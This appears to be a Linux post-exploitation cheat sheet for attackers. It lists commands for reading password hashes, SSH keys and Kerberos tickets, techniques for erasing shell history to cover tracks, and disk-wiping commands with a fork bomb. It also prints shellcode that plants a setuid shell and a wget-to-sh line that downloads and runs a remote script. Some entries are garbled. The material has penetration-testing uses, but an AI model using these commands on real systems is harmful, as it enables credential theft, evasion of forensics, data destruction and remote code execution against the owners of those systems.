post exploit linux

Linux Post Exploit

Table of Contents

• Information Gathering
  • Linux Commands
    • Blind Files
    • System
    • Network
    • User Accounts
    • User Information
    • Credentials
    • Configs
    • Determine Distro
    • Installed Packages
    • Package Sources
    • Finding Important Files
    • Other Utilities
• Covering Your Tracks
  • Avoiding history filesmys
  • Deleting and Destroying
• Escalating
  • Looking for possible opened paths
• Maintaining Control
  • Reverse Shell
  • Execute a Remote Script

Information Gathering

Blind Files

Things to pull when all you can do is blindly read like in LFI/dir traversal (Don’t forget %00!)

File	Contents and Reason
/etc/resolv.conf	Contains the current name servers (DNS) for the system. This is a globally readable file that is less likely to trigger IDS alerts than /etc/passwd
/etc/motd	Message of the Day
/etc/issue	current version of distro
/etc/passwd	List of local users
/etc/shadow	List of users’ passwords’ hashes (requires root)
/home/xxx/.bash_history	Will give you some directory context

System

Command	Description and/or Reason
uname -a	Prints the kernel version, arch, sometimes distro
ps aux	List all running processes
top -n 1 -d	Print process, 1 is a number of lines
id	Your current username, groups
arch, uname -m	Kernel processor architecture
w	who is connected, uptime and load avg
who -a	uptime, runlevel, tty, proceses etc.
df -k	mounted fs, size, % use, dev and mount point
mount	mounted fs
last -a	Last users logged on.
lastb	Require admin rights.
lastcomm	Not installed by default - GNU Accounting utilities for process and login accounting
lastlog	Show who last logged in.
lastlogin	On BSD systems
getenforce	Get the status of SELinux (Enforcing, Permissive or Disabled)
dmesg	Informations from the last system boot
lspci	prints all PCI buses and devices
lsusb	prints all USB buses and devices
lscpu	prints CPU information
lshw	list hardware information
cat /proc/cpuinfo
cat /proc/meminfo
du -h --max-depth=1 /	note: can cause heavy disk i/o
which nmap	locate a command (ie nmap or nc)
locate bin/nmap
locate bin/nc
jps -l

Network

Command	Description and/or Reason
hostname -f	ong host name (FQDN)
ip addr	Show IP information
ip route	Show IP route
ifconfig -a
route -n	Show IP route
cat /etc/network/interfaces
iptables -L -n -v
iptables -t nat -L -n -v
ip6tables -L -n -v
iptables-save
netstat -anop
netstat -r
netstat -nltupw	root with raw sockets
arp -a	Show arp table with IP info
lsof -nPi
cat /proc/net/*	More discreet, all the information given by the above commands can be found by looking into the files under /proc/net, and this approach is less likely to trigger monitoring or other stuff

User Accounts

Command	Description and/or Reason
cat /etc/passwd	local accounts
cat /etc/shadow	password hashes on Linux
/etc/security/passwd	password hashes on AIX
cat /etc/group	groups (or /etc/gshadow)
getent passwd	should dump all local, LDAP, NIS, whatever the system is using
getent group	same for groups
pdbedit -L -w	Samba’s own database
pdbedit -L -v
cat /etc/aliases	mail aliases
find /etc -name aliases
getent aliases
ypcat passwd	displays NIS password file

Obtain user's information

Command	Description and/or Reason
ls -alh /home/*/
ls -alh /home/*/.ssh/	SSH files, hopefully finding private keys
cat /home/*/.ssh/authorized_keys	SSH Authorization keys
cat /home/*/.ssh/known_hosts	SSH know host files
cat /home/\*/.*hist*	Bash history files, you can learn a lot from this
grep ^ssh /home/*/.*hist*
grep ^telnet /home/*/.*hist*
grep ^mysql /home/*/.*hist*
find /home/\*/.vnc /home/\*/.subversion -type f
cat /home/*/.viminfo
sudo -l	if sudoers is not. readable, this sometimes works per user
crontab -l
cat /home/*/.mysql_history
sudo -p	Allows the user to define what the password prompt will be, useful for fun customization with aliases or shell scripts

Credentials

File/Folder	Description and/or Reason
/home/\*/.ssh/id*	SSH keys, often passwordless
/tmp/krb5cc_*	Kerberos tickets
/tmp/krb5.keytab	Kerberos tickets
/home/*/.gnupg/secring.gpgs	PGP keys

Configs

File/Folder	Description and/or Reason
ls -aRl /etc/ * awk '$1 ~ /w.$/' * grep -v lrwx 2>/dev/nullte
cat /etc/issue{,.net}
cat /etc/master.passwd
cat /etc/group
cat /etc/hosts
cat /etc/crontab
cat /etc/sysctl.conf
for user in $(cut -f1 -d: /etc/passwd); do echo $user; crontab -u $user -l; done	Lists all crons
cat /etc/resolv.conf
cat /etc/syslog.conf
cat /etc/chttp.conf
cat /etc/lighttpd.conf
cat /etc/cups/cupsd.confcda
cat /etc/inetd.conf
cat /opt/lampp/etc/httpd.conf
cat /etc/samba/smb.conf
cat /etc/openldap/ldap.conf
cat /etc/ldap/ldap.conf
cat /etc/exports
cat /etc/auto.master
cat /etc/auto_master
cat /etc/fstab
find /etc/sysconfig/ -type f -exec cat {} \;

Determine Distro

File	Description and/or Reason
uname -a	often hints at it pretty well
lsb_release -d	Generic command for all LSB distros
/etc/os-release	Generic for distros using “systemd”
/etc/issue	Generic but often modified
cat /etc/*release
/etc/SUSE-release	Novell SUSE
/etc/redhat-release, /etc/redhat_version	Red Hat
/etc/fedora-release	Fedora
/etc/slackware-release, /etc/slackware-version	Slackware
/etc/debian_release, /etc/debian_version	Debian
/etc/mandrake-release	Mandrake
/etc/sun-release	Sun JDS
/etc/release	Solaris/Sparc
/etc/gentoo-release	Gentoo
/etc/arch-release	Arch Linux (file will be empty)
arch	OpenBSD; sample: “OpenBSD.amd64”

Installed Packages

Command	Description and/or Reason
rpm -qa --last	head
yum list	grep installed
dpkg -l	Debian
dpkg --get-selections	Debian
pkg_info	{Free,Net}BSD
pkginfo	Solaris
cd /var/db/pkg/ && ls -d */*	Gentoo
pacman -Q	Arch Linux

Package Sources

Command	Description and/or Reason
cat /etc/apt/sources.list	Debian
ls -l /etc/yum.repos.d/
cat /etc/yum.conf

Finding Important Files

| -----------------------------------------------------------------------------|
|    COMMAND                              |     Description and/or Reason      |
| -----------------------------------------------------------------------------|

ls -dlR */

find /var -type d

ls -alR | grep ^d             

ls -dl \`find /var -type d\`

ls -dl \`find /var -type d\` | grep -v root

find /var ! -user root -type d -ls

find /var/log -type f -exec ls -la {} \;

### Find all suid files
find / -perm -4000

ls -alhtr /mnt

ls -alhtr /media

ls -alhtr /tmp

ls -alhtr /home

cd /home/; treels /home/*/.ssh/*

find /home -type f -iname '.*history'

ls -lart /etc/rc.d/

### Remember to updatedb before running locate
locate tar | grep [.]tar$                         
locate tgz | grep [.]tgz$
locate sql | grep [.]sql$
locate settings | grep [.]php$
locate config.inc | grep [.]php$

ls /home/\*/id*

### java config files
.properties | grep [.]properties

### java/.net config files        
locate .xml | grep [.]xml

### find suids
find /sbin /usr/sbin /opt /lib \`echo $PATH | ‘sed s/:/ /g’\` -perm /6000 -ls 
locate rhosts

Also, check http://incolumitas.com/uploads/2012/12/blackhats_view.pdf for some one-liners that find world writable directories/files and more.

Other Utilities

Command	Description and/or Reason
sort	Sort a text file.

Covering Your Tracks

Avoiding history filesmys

• export HISTFILE=
  or
• unset HISTFILE

This next one might not be a good idea, because a lot of folks know to check for tampering with this file, and will be suspicious if they find out.

However, if you happen to be on an account that was originally inaccessible, if the .bash_history file is available (ls -a ~), viewcating its contents can provide you with a good deal of information about the system and its most recent updates/changes.
clear all history in ram

File	Description and/or Reason
history -c
rm -rf ~/.bash_history && ln -s ~/.bash_history /dev/null	Invasive
touch ~/.bash_history	Invasive
<space> history -c	Using a space before a command
zsh% unset HISTFILE HISTSIZE
tcsh% set history=0
bash$ set +o history
ksh$ unset HISTFILE
find / -type f -exec {}	Forensics nightmare

Note that you’re probably better off modifying or temporary disabling rather than deleting history files, it leaves a lot less traces and is less suspect.

In some cases HISTFILE and HISTFILESIZE are made read-only; get around this by explicitly clearing history (history -c) or by kill -9 $$’ing the shell. Sometimes the shell can be configured to run ‘history -w’ after every command; get around this by overriding ‘history’ with a no-op shell function. None of this will help if the shell is configured to log everything to syslog, however.

Deleting and Destroying

Do not tell me you ar that kind of bitch!

If it is necessary to leave the machine inaccessible or unusable. Note that this tends to be quite evident (as opposed to a simple exploitation that might go unnoticed for some time, even forever), and will most surely get you into troubles.
Oh, and you’re probably a jerk if you use any of the stuff below.

File	Description and/or Reason
rm -rf /	This will recursively try to delete all files
mkfs.ext3 /dev/sda	Reformat the device mentioned, making recovery of files hard
dd if=/dev/zero of=/dev/sda bs=1M	Overwrite disk /dev/sda with zeros

• Hex version of rm -rf / (How is this supposed to work?)

char esp[] \_\_attribute\_\_ ((section(”.text”))) /* e.s.p release */ = “\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68\"  
“\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99\"  
“\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7\"  
“\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56"  
“\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31"  
“\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69"  
“\x6e\x2f\x73\x68\x00\x2d\x63\x00"  
“cp -p /bin/sh /tmp/.beyond; chmod 4755 /tmp/.beyond;”;  

• Fork Bomb: The [in]famous "fork bomb". This command will cause your system to run a large number of processes, until it "hangs". This can often lead to data loss (e.g. if the user brutally reboots, or the OOM killer kills a process with unsaved work). If left alone for enough time a system can eventually recover from a fork bomb.

:(){:|:&};

Escalating

Looking for possible opened paths

See the great linPEAS tool!: https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS

File	Description and/or Reason
ls -alh /root/
sudo -l
cat /etc/sudoers
cat /etc/shadow
cat /etc/master.passwd # OpenBSD
cat /var/spool/cron/crontabs/*
cat /var/spool/cron/*
lsof -nPi
ls /home/\*/.ssh/*:

Maintaining control

Reverse Shell

See the dedicated document: Reverse Shell

Execute a Remote Script

wget http://server/file.sh -O- | sh
This command forces the download of a file and immediately its execution